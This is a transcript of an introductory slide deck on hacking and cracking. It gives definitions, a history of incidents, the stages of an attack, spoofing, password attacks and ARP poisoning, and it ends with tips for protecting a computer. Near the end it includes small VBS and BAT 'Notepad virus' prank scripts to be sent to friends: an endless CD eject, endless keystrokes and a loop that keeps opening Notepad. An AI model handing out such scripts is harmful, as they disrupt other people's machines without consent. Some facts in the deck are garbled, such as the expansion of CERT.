introduction of hacking and cracking
TRANSCRIPT
Introduction of Hacking and
Cracking
Prepared By :- Harshil Barot
Department Of Computer
Science,H.N.G.University,Patan,Gujarat.(In
dia)
WHAT IS HACKING ?
Hacking is the act of penetrating a closed computer
system for the knowledge and information that is
contained within. Through the study of technology
and computers a hacker can open his mind and
expand his knowledge.
LEVELS OF HACKERS
•High-level hackers
High-level hackers are sophisticated users with large knowledge of
technology.
•Low-level hackers
Low-level hackers are “Foot Soldiers” who marks programs with little
understanding of how they worked. Unfortunately hackers also gain the access
of CERT (Computer Emergency Response Time).
Hacker is someone with deep understanding of computers and/or
networking. Art of hacking can be with positive or negative intensions
WHO IS HACKER?
HACKER IS NOT CYBER CRIMINAL BUT HE
IS THE VERY INTELLIGENT PERSON WHO IS
USE HIS KNOWLEDGE IN CONSTRUCTIVE
MANNER TO SECURE SYSTEM & NEVER
DAMAGE DATA
HE KNOW ALL ABOUT THE OPERATING
SYSTEM & DIFFERENT HOLES IN THE
SYSTEM
WHO IS CRACKER?
PERSON WHO ENTER INTO OTHER’S SYSTEM AND VIOLET THE SYSTEM,DAMAGE THE DATA,CREATE HAVOC IS CALLED CRACKER
CRACKER IS CYBER CRIMINAL
THEY CAN BE EASILY IDENTIFIED BECAUSE THEIR ACTIONS ARE MALICIOUS
1 . Hacking - showing computer expertise.
Unauthorized use of computer and network resources
2 . Cracking - breaking security on software or systems
3 . Phreaking - cracking telecom networks(Telephone
Hacking)
4 . Spoofing(Phishing) - faking the originating IP address
in a datagram
History Of Hacking :- 1969 - Unix ‘hacked’ together
1971 - Cap ‘n Crunch phone exploit discovered
1988 - Morris Internet worm crashes 6,000 servers
1994 - $10 million transferred from CitiBank accounts
1995 - Kevin Mitnick sentenced to 5 years in jail
2000 - Major websites succumb to DDoS( distributed denial-of-service)
2000 - 15,700 credit and debit card numbers stolen from Western Union (hacked while web database was undergoing maintenance)
2001 Code Red
◦ exploited bug in MS IIS to penetrate & spread
◦ probes random IPs for systems running IIS
◦ had trigger time for denial-of-service attack
◦ 2nd wave infected 360000 servers in 14 hours
Code Red 2 - had backdoor installed to allow remote control
Nimda -used multiple infection mechanisms email, shares, web client, IIS 2002 – Slammer Worm brings web to its knees by attacking MS SQL
Server
Types Of Hacker1.White Hat hacker :- breaks security for security perpose2.Black hat Hacker : -break security for unauthorised use3.Grey hat hacker :- Com. of white hat and black hat.
They may offer to repaire the system.4.Blue Hat hacker :- someone outside computer security who use the system5.script kiddie :- Mostly student. Use tools created by black hats
THE PROCESS OF HACKING
Some common steps that hackers have to follow r as follows :-
•Footprinting
Before the real fun begins for hackers, the three essentials steps must be
performed. Firstly , the hackers creates a profile of the company’s security posture. This is known as footprinting .
Scanning
The second step is that of scanning in which the hacker tests each target system
to see if it is alive or not.•Enumeration
Next, the hacker will try to identify valid user accounts and poorly protected
resource shares, using enumeration process.
•Gaining Access
For target systems running Windows, hackers can guess passwords for
enumerated user names, using an automatic tool and a list of passwords to try, and can be successful if a strong password policy is not followed and account
lockouts r not implemented .
•Tracks Covered
Tracks can be disabled and then enabled by clearing the event log.•Backdoors
There is a keystroke logger , which is between the OS and keyboard hardware and
records every keystroke. On tracing its output hackers can easily identify what
steps have done before and thus can identify the username and password
Why do hackers hack?
JUST FOR FUN
SHOW OFF
HACK OTHER SYSTEMS SECRETLY
NOTIFY MANY PEOPLE THEIR THOUGHT
STEAL IMPORTANT INFORMATION
DESTROY ENEMY’S COMPUTER NETWORK DURING THE
WAR
What do hackers do after hacking? (2)
INSTALL IRC RELATED PROGRAM
identd, irc, bitchx, eggdrop, bnc
INSTALL SCANNER PROGRAM
mscan, sscan, nmap
INSTALL EXPLOIT PROGRAM
INSTALL DENIAL OF SERVICE PROGRAM
USE ALL OF INSTALLED PROGRAMS SILENTLY
What do hackers know?
DON’T KNOW HOW TO USE VI
DON’T KNOW WHAT UNIX IS
DON’T KNOW WHAT THEY DO
KNOW HOW TO INTRUDE THE SYSTEM
KNOW HOW TO CRASH THE SYSTEM
KNOW WHERE THE HACKING
PROGRAMS ARE
How can kid hack?
KID HAS MUCH OF TIME
Kid can search for longer time than other
people
ALL HACKING PROGRAM IS EASY TO
USE
KID DOESN’T HAVE TO KNOW HOW
THE HACKING PROGRAM WORKS
THESE KIDS ARE CALLED SCRIPT
KIDDIES
How can be a real hacker?
STUDY C/C++/ASSEMBLY LANGUAGE
STUDY COMPUTER ARCHITECTURE
STUDY OPERATING SYSTEM
STUDY COMPUTER NETWORK
EXAMINE THE HACKING TOOLS FOR A MONTH
THINK THE PROBLEM OF THE COMPUTER
Why can’t defend against hackers?
THERE ARE MANY UNKNOWN SECURITY HOLE
HACKERS NEED TO KNOW ONLY ONE
SECURITY HOLE TO HACK THE SYSTEM
ADMIN NEED TO KNOW ALL SECURITY HOLES
TO DEFEND THE SYSTEM
What should do after hacked?
SHUTDOWN THE SYSTEM
Or turn off the system
SEPARATE THE SYSTEM FROM NETWORK
RESTORE THE SYSTEM WITH THE BACKUP
Or reinstall all programs
CONNECT THE SYSTEM TO THE NETWORK
IT CAN BE GOOD TO CALL THE POLICE
How to translate the hackers’ language (1)
1 -> i or l3 -> e4 -> a7 -> t9 -> g0 -> o$ -> s| -> i or l
|\| -> n
|\/| -> m
s -> z
z -> s
f -> ph
ph -> f
x -> ck
ck -> x
How to translate the hackers’
language (2) Ex)
◦ 1 d1d n0t h4ck th1s p4g3, 1t w4s l1k3 th1s
wh3n 1 h4ck3d 1n
◦ I did not hack this page, it was like this when I
hacked in
Protect your Computers!
Use anti-virus software and firewalls - keep them up to date
Keep your operating system up to date with critical security updates and patches
Don't open emails or attachments from unknown sources
Use hard-to-guess passwords. Don’t use words found in a dictionary. Remember that password cracking tools exist
Back-up your computer data on disks or CDs often
Don't share access to your computers with strangers
If you have a wi-fi network, password protect it
Disconnect from the Internet when not in use
Reevaluate your security on a regular basis
Make sure your employees and family members know this info too!
Over the Internet
Over LAN
Locally
Offline
Theft
Deception
Modes of Hacker Attack
Because they can
◦ A large fraction of hacker attacks have been pranks
Financial Gain
Espionage
Venting anger at a company or organization
Terrorism
Why do Hackers Attack?
Active Attacks
◦ Denial of Service
◦ Breaking into a site
Intelligence Gathering
Resource Usage
Deception
Passive Attacks
◦ Sniffing
Passwords
Network Traffic
Sensitive Information
◦ Information Gathering
Types of Hacker Attack
Definition:
An attacker alters his identity so that some one thinks he
is some one else
◦ Email, User ID, IP Address, …
◦ Attacker exploits trust relation between user and
networked machines to gain access to machines
Types of Spoofing:
1. IP Spoofing:
2. Email Spoofing
3. Web Spoofing
Spoofing
A hacker can exploit a weak passwords & uncontrolled network modems easily
Steps
◦ Hacker gets the phone number of a company
◦ Hacker runs war dialer program
If original number is 555-5532 he runs all numbers in the 555-55xx range
When modem answers he records the phone number of modem
◦ Hacker now needs a user id and password to enter company network Companies often have default accounts e.g. temp, anonymous with no
password
Often the root account uses company name as the password
For strong passwords password cracking techniques exist
Password Attacks
Password Attacks
Two kinds: Password Guessing and Password Cracking
Password Guessing: Attempt to guess the password for a particular user ID. This process is rarely successful, time consuming, and generates a lot of network traffic. Also, some accounts are locked out after a set number of unsuccessful guesses. Many password-guessing tools can be found at Packet Site:
Common scenarios in Cyber Crime
Unauthorized access: This occurs when a user/hacker deliberately gets access
into someone else’s network either to monitor or data destruction purposes
Denial of service attack: It involves sending of disproportionate demands or
data to the victims server beyond the limit that the server is capable to handle and
hence causes the server to crash
Virus, Worms and Trojan attacks: Viruses are basically programs that are
attached to a file which then gets circulated to other files and gradually to other
computers in the network. Worms unlike Viruses do not need a host for
attachments they make copies of themselves and do this repeatedly hence eating
up all the memory of the computer. Trojans are unauthorized programs which
functions from inside what seems to be an authorized program, thereby concealing
what it is actually doing.
Email Bombing It refers to sending a large number of emails to
the victim resulting in the victim's email account (in case of an
individual) or mail servers (in case of a company or an email service
provider) crashing
Internet Time Thefts This connotes the usage by an
unauthorized person of the Internet hours paid for by another.
Web Jacking This occurs when someone forcefully takes control of a website (by
cracking the password and later changing it). The actual owner of the website does
not have any more control over what appears on that website
Theft and Physical damage of computer or its peripherals This type of
offence involves the theft of a computer, some parts of a computer or a peripheral
attached to the computer. and physically damaging a computer or its peripherals
Think before you Click
IP ADDRESS
IP ADDRESS IS THE ADDRESS OF YOUR
COMPUTER IN THE INTERNET
IT IS UNIQ
LIKE 192.168.23.45
Passive Sniffing
login:
devesh
passwd:
india123
SNIFFER
In Hub Networks
ARP Cache Poisoning
IP -> 192.168.51.36
MAC -> 00:00:00:BB:BB:BB
Internal ARP Cache
192.168.51.35 – 00:00:00:CC:CC:CC
System B
IP -> 192.168.51.35
MAC -> 00:00:00:AA:AA:AA
Internal ARP Cache
192.168.51.36 – 00:00:00:CC:CC:CC
System A
IP -> 192.168.51.37
MAC -> 00:00:00:CC:CC:CCInternal ARP Cache
192.168.51.36 – 00:00:00:BB:BB:BB
192.168.51.35 – 00:00:00:AA:AA:AA
Attacker
192.168.51.36 is at
00:00:00:CC:CC:CC 192.168.51.35 is at
00:00:00:CC:CC:CC
Knowing IP addresses
IP address is a
unique web address
for each computer
connected to
internet
Knowing this is
essential before
anything else
Symptoms
Targeted Pop-ups
Slow Connection
Targeted E-Mail (Spam)
Unauthorized Access
Spam Relaying
System Crash
Program Customisation
SPYWARE
SPYWARE / TROJAN
SPYWARE
TROJAN HORSE
TROJAN HORSE
SPYWARE/ TROJAN
SPYWARE
32
Small Notepad Virus :-
More Notepad Viruses
1)Continually pop out your friend's CD Drive.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.
Hack Computer keyboard and make him type “Keyboard not working"
simultaneously:
Set wshShell =
wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys“Keyboard not working"
loop
Save it as "Anything.VBS" and send it.
Open Notepad continually in your computer
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “Anything.BAT" and send it.
LIST OF SITES THAT WERE HACKED
•-Monmouth Army Base --- http://www.monmouth.army.mil/
•-US Army --- http://www4.army.mil/
•-The Jerry Springer Show --- http://www.jerryspringer.com/
•-Symantec Corporation --- http://www.symantec.com/
•-U.S. Department of Commerce Institute for Telecommunication
Sciences --- http://elbert.its.bldrdoc.gov/
•-Technical University of Denmark --- http://lanpc11.ilf.dtu.dk
•Illinois Natural History Survey --- http://nuclear.hazard.uiuc.edu
• Monica Lewinsky's site ---http://www.monicalewinsky.com/
•Phoenix Data Systems ---http://www.phoenixds.at/
•Ruchi Group ---http://www.ruchigroup.com/
•Concept Reseau ---http://www.concept-reseau.fr/
•Wayne University US Department ---http://www.us.wayne.edu/